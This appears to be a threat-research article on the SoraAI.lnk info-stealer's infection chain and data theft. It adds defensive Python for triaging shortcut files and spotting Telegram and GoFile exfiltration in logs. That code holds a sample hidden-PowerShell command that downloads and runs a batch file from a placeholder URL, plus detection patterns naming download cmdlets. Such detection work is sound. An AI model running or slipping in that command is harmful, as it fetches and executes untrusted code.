
A new info-stealer, delivered as a Windows shortcut file named SoraAI.lnk, is leveraging the popularity of OpenAI’s video model, Sora, to infect unsuspecting users. First detected in Vietnam on May 21, 2025, the shortcut-based threat has since spread internationally, posing as a legitimate AI tool to lure its victims.
“Threat actors lure users via social engineering tactics to click on malicious files of the same name as legitimate AI models and propagate their agenda,” K7 Labs reports.
SoraAI runs a multi-stage infection chain: a seemingly harmless shortcut file, two chained batch-file downloaders, and finally a Python-based info stealer.
Stage 1: The Shortcut
The attack begins with a .lnk file whose target is cmd.exe. The shortcut launches a hidden PowerShell script that connects to a malicious GitHub repository and downloads a file named a.bat.
Stage 2: Chained Batch Scripts
The a.bat script retries in a loop until it has downloaded a ZIP payload. It extracts and executes f.bat, which in turn downloads and runs 1.bat, the final dropper.
Stage 3: Python Execution
1.bat silently installs the Python packages the stealer depends on (requests, pywin32 and cryptography among them) and then executes python.py, the actual malware.
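The Stage 1 shortcut is the artifact a defender is most likely to get hold of first, so a static check of .lnk files for the pattern described above (target cmd.exe, arguments that start a hidden PowerShell download from GitHub) is worth having. The following is an added example written for this write-up; it is not code from K7 Labs or from the malware. It reads the MS-SHLLINK binary format directly: the fixed 0x4C-byte header, the LinkInfo block (for the LocalBasePath target) and the StringData fields (working directory, command-line arguments); it skips the LinkTargetIDList rather than parsing shell item IDs. The indicator list generalizes a little beyond the article (other script hosts, other download cmdlets), and the two sample shortcuts are constructed in the block itself; the GitHub URL inside them is a placeholder, not an indicator from the report.

```python
"""Static triage of Windows shortcut (.lnk) files: does the shortcut start cmd.exe
and hand it arguments that launch a hidden PowerShell download? Added example,
not code from K7 Labs or from the malware; see the lead-in for assumptions."""
import re
import struct

# LinkFlags bits from the MS-SHLLINK specification
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7   # ShowCommand value that keeps the launched window minimized

# cmd.exe is the target from the report; the other script hosts are this example's generalization.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
ARG_INDICATORS = [
    ("launches PowerShell", re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh\b", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("execution policy bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I)),
    ("encoded command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("web download", re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile"
                                r"|\bcurl\b|bitsadmin|https?://", re.I)),
    ("GitHub-hosted payload", re.compile(r"github(?:usercontent)?\.com", re.I)),
    ("batch-file stage", re.compile(r"\b\w+\.bat\b", re.I)),
]


def _read_string(buf, pos, unicode):
    """StringData item: uint16 character count followed by the characters."""
    (count,) = struct.unpack_from("<H", buf, pos)
    pos += 2
    if unicode:
        return buf[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
    return buf[pos:pos + count].decode("latin-1"), pos + count


def parse_lnk(data: bytes) -> dict:
    """Return target, working dir, arguments and ShowCommand of a .lnk blob."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != SHELL_LINK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    (show_cmd,) = struct.unpack_from("<I", data, 0x3C)
    info = {"target": None, "relative_path": None, "working_dir": None,
            "arguments": None, "show_command": show_cmd}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip: uint16 size + item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                        # VolumeIDAndLocalBasePath present
            end = data.index(b"\x00", pos + lbp_off)
            info["target"] = data[pos + lbp_off:end].decode("latin-1")
        pos += li_size
    unicode = bool(flags & IS_UNICODE)
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            info[key], pos = _read_string(data, pos, unicode)
    return info


def triage(info: dict) -> list:
    """Indicators found in a parsed shortcut; an empty list means nothing matched."""
    findings = []
    target = (info.get("target") or info.get("relative_path") or "").replace("/", "\\")
    base = target.rsplit("\\", 1)[-1].lower()
    if base in SCRIPT_HOSTS:
        findings.append(f"target is a script host: {base}")
    args = info.get("arguments") or ""
    findings += [label for label, rx in ARG_INDICATORS if rx.search(args)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(target, arguments, show_command, working_dir=r"C:\Windows\System32") -> bytes:
    """Assemble a minimal shortcut with a LinkInfo target (constructed test input only)."""
    lbp = target.encode("latin-1") + b"\x00"
    volume_id = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"    # DRIVE_FIXED, empty label
    lbp_off = 0x1C + len(volume_id)
    suffix_off = lbp_off + len(lbp)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, 0x1C, lbp_off, 0, suffix_off) \
        + volume_id + lbp + b"\x00"
    flags = HAS_LINK_INFO | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + SHELL_LINK_CLSID + struct.pack("<II", flags, 0x20) \
        + b"\x00" * 24 + struct.pack("<IiIHHII", 0, 0, show_command, 0, 0, 0, 0)
    s = lambda t: struct.pack("<H", len(t)) + t.encode("utf-16-le")
    return header + link_info + s(working_dir) + s(arguments)


MALICIOUS_ARGS = ('/c powershell -w hidden -ep bypass -c "iwr '
                  'https://raw.githubusercontent.com/example/example/main/a.bat '
                  '-OutFile a.bat; .\\a.bat"')           # placeholder URL, not a real IOC
SAMPLES = {  # constructed stand-ins; the first mimics the reported SoraAI.lnk behaviour
    "SoraAI.lnk": build_lnk(r"C:\Windows\System32\cmd.exe", MALICIOUS_ARGS, SW_SHOWMINNOACTIVE),
    "Notepad.lnk": build_lnk(r"C:\Windows\System32\notepad.exe", "", 1),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        info = parse_lnk(blob)
        hits = triage(info)
        print(f"{name}: target={info['target']} -> {'SUSPICIOUS' if hits else 'clean'}")
        for h in hits:
            print("   -", h)
```

To run it over a real collection, replace SAMPLES with `parse_lnk(open(path, "rb").read())` for each file. Note that a shortcut whose LinkInfo block is absent (only a LinkTargetIDList) comes back with `target` set to None; the triage then falls back to the relative path, which many droppers still leave populated.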
The python.py script is the core of the SoraAI malware. It:

- Establishes persistence by placing f.bat in the Startup folder, so the download-and-run chain repeats at each logon.
- Harvests browser data like cookies and passwords from Chrome, Firefox, and Opera.
- Steals WiFi credentials, game launcher configs, and crypto wallet data.
- Compresses and exfiltrates data via Telegram or GoFile.io, depending on size.
“It collects various system information including process information, network information, wifi information…,” K7 Labs explains.
SoraAI demonstrates advanced tactics including:
- Custom decryption of Chrome’s Application-bound Encryption using chrome_decrypt.dll.
- Opera-specific password theft using extracted AES keys.
- Crypto wallet reconnaissance from both installed apps and browser extensions.
- Multi-path data collection from locations like Desktop, Downloads, and Documents.
Once data is zipped and tagged with country and IP, it’s either directly sent via a Telegram bot or uploaded to GoFile.io with notification links forwarded to the attacker.
“Sends the zip archive directly if file size is less than 49MB… If the size exceeds 49MB, it uploads it to an external file hosting website ‘GoFile.io’,” K7 Labs notes.
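The two exfiltration paths are visible on the wire: small archives go straight to the Telegram Bot API, larger ones to GoFile.io with a notification sent afterwards. The following added example (written for this write-up, not code from K7 Labs) flags both in egress or proxy logs and correlates them per host. The log lines are constructed, and their format "timestamp host process method url bytes_out" is an assumption, as are the bot token and the GoFile upload host in the samples.

```python
"""Detect the stealer's two exfil paths in egress logs. Added example, not code
from K7 Labs; log format and sample lines are constructed assumptions."""
import re
from collections import defaultdict

# Bot API calls always look like https://api.telegram.org/bot<id>:<token>/<method>.
# Ordinary Telegram clients never use this path, so a hit from any process is worth a look.
TELEGRAM_BOT_RX = re.compile(r"^https://api\.telegram\.org/bot\d+:[\w-]+/(\w+)", re.I)
GOFILE_RX = re.compile(r"^https://(?:[\w-]+\.)*gofile\.io/", re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "opera.exe", "brave.exe"}

LOG_LINES = [  # constructed sample, not real telemetry; token and upload host are placeholders
    "2025-05-21T10:14:02Z HOST01 python.exe POST https://api.telegram.org/bot123456789:AAExampleToken_000/sendDocument 38211034",
    "2025-05-21T10:14:05Z HOST01 chrome.exe GET https://www.example.com/ 512",
    "2025-05-21T10:20:41Z HOST02 python.exe POST https://store1.gofile.io/uploadFile 61903744",
    "2025-05-21T10:20:44Z HOST02 python.exe POST https://api.telegram.org/bot123456789:AAExampleToken_000/sendMessage 212",
    "2025-05-21T10:31:09Z HOST03 firefox.exe POST https://gofile.io/uploadFile 1048576",
]


def parse_line(line: str) -> dict:
    """Split one 'timestamp host process method url bytes_out' record."""
    ts, host, process, method, url, size = line.split()
    return {"ts": ts, "host": host, "process": process, "method": method,
            "url": url, "bytes_out": int(size)}


def detect(lines) -> list:
    """One finding per event that matches either exfil path."""
    findings = []
    for ev in map(parse_line, lines):
        m = TELEGRAM_BOT_RX.match(ev["url"])
        if m:
            findings.append({"host": ev["host"], "kind": "telegram-bot",
                             "detail": f"{m.group(1)} from {ev['process']}, {ev['bytes_out']} bytes"})
        elif (GOFILE_RX.match(ev["url"]) and ev["method"].upper() == "POST"
              and ev["process"].lower() not in BROWSERS):
            # A user dragging a file into gofile.io in a browser is plausible;
            # a POST from python.exe or a script host is not.
            findings.append({"host": ev["host"], "kind": "gofile-upload",
                             "detail": f"from {ev['process']}, {ev['bytes_out']} bytes"})
    return findings


def correlate(findings) -> list:
    """Hosts on the large-archive path: a GoFile upload plus a Telegram bot notification."""
    kinds = defaultdict(set)
    for f in findings:
        kinds[f["host"]].add(f["kind"])
    return sorted(h for h, k in kinds.items() if {"telegram-bot", "gofile-upload"} <= k)


if __name__ == "__main__":
    found = detect(LOG_LINES)
    for f in found:
        print(f"{f['host']}: {f['kind']} {f['detail']}")
    print("large-archive path on:", correlate(found))
```

The 49MB cut-off K7 Labs quotes sits just under the Telegram Bot API's 50MB limit for files a bot can send, which is why the stealer needs the second channel at all; blocking api.telegram.org for non-interactive processes removes the small-archive path and forces the noisier GoFile upload.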
K7 Labs concludes with a warning: “In this world of digital ecosystem it is very important for oneself to understand and differentiate between real and fake resources.”
To mitigate risks:
- Only download software from trusted sources.
- Double-check filenames and extensions before execution. Windows Explorer never displays the .lnk extension, even when hidden extensions are turned off, so a shortcut named SoraAI.lnk shows up simply as "SoraAI"; treat any unexpected shortcut as you would an executable.
- Use updated antivirus solutions.
- Stay informed about new cyberthreats.